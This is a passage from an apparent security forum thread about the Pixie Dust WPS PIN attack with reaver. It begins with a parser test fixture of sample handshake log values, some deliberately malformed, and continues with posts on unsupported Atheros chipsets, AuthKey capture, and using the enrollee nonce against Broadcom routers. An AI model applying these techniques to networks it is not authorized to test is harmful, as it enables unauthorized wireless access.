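# wrap-inserted spaces); attempt 2 uses a plain-hex nonce, drops the last byte of
# its AuthKey, omits E-Hash2 and carries a small-DH PKR as reaver -S would send.
SAMPLE_LOG = "\n".join([
    "[+] Trying pin 00005678.",
    "> N1 Enrollee Nonce: f8:49:5a:df:00:b7:0b:9b:6c:cc:64:2d:11:c8:89:52",
    "> AuthKey: ce:cc:a5:98:fb:a8:5c:c7:7b:5f:1a:a2:be:ca:1b:b5:40 :27:72:a3:3e:d7:4b:db:dd:78:bf:3c:02:bc:51:aa",
    "> E-Hash1: 75:26:1a:d3:bd:73:ed:8e:3e:15:3b:aa:33:b0:dd:92:03 :0b:93:7e:93:cb:c0:ec:34:64:9b:06:ea:61:71:8b",
    "> E-Hash2: 01:d6:8f:f1:9d:3d:da:52:3c:45:42:2f:5f:55:f2:3a:0c :00:3f:f2:ae:bf:9c:7b:12:6e:ee:56:89:2c:52:d3",
    "[+] Trying pin 01235678.",
    "> N1 Enrollee Nonce: 272b380dfc3a1706d47dd3094d868795",
    "> AuthKey: 51:29:84:ca:f5:96:d2:b8:f3:90:9f:81:1f:3e:48:57:2e:5c:b1:81:13:83:84:66:86:82:d3:5b:1b:9b:75",
    "> E-Hash1: 870f45302f61615388cbb623e9ead5229ac4c362ff2a02b799a19d99d945f782",
    "M2 PKR - " + ":".join(["00"] * 191 + ["02"]),
])
```

Running `parse_reaver_output(SAMPLE_LOG)` returns two sessions: the first clean, the second listing the short AuthKey and missing E-Hash2 and carrying `small_dh = True`.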

  41. #41
    hey, is there any way to get the AK from Wireshark only?

  42. #42
    If anyone has luck on devices can you post your HW info?
    didn't work for
    TP link 841N v8 - AR9341
    TP link 841N v9 - QCA9533-AL3A
    TP link 720N v1 - AR9331

  43. #43
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Those are all Atheros, which is not supported; that's why it didn't work.

  44. #44
    Quote Originally Posted by soxrok2212 View Post
    Those are all Atheros not supported that's why it didn't work
    that's a bummer...

  45. #45
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    many ,many thanks for this thread && hard work && scripts guys!!!!! (soxrok2212,wiire,kcdtv,rep.....thanks-so-much.)
    really appreciate!!!!
    one-test...seem correct
    http://www.imagestime.com/show.php/1...pixie.PNG.html

  46. #46
    Quote Originally Posted by zimmaro View Post
    many ,many thanks for this thread && hard work && scripts guys!!!!! (soxrok2212,wiire,kcdtv,rep.....thanks-so-much.)
    really appreciate!!!!
    one-test...seem correct
    http://www.imagestime.com/show.php/1...pixie.PNG.html
    You could've just converted the last 6 bytes of the MAC to decimal to get the PIN. But whatever...

    10/10 for the drawing!

    @wn722
    No.

  47. #47
    Join Date
    2013-Aug
    Location
    lost in space
    Posts
    580
    Many thanks soxrok2212 and all who participated! Epic thread

  48. #48
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by Quest View Post
    Many thanks soxrok2212 and all who participated! Epic thread
    Don't forget Wiire... the actual creator of the tool!

  49. #49
    Quick question. Would it matter if I always use the enrollee nonce? Or should I only use it in certain cases?

  50. #50
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Nah it shouldn't matter... Just be sure to always use it when you attack broadcom.
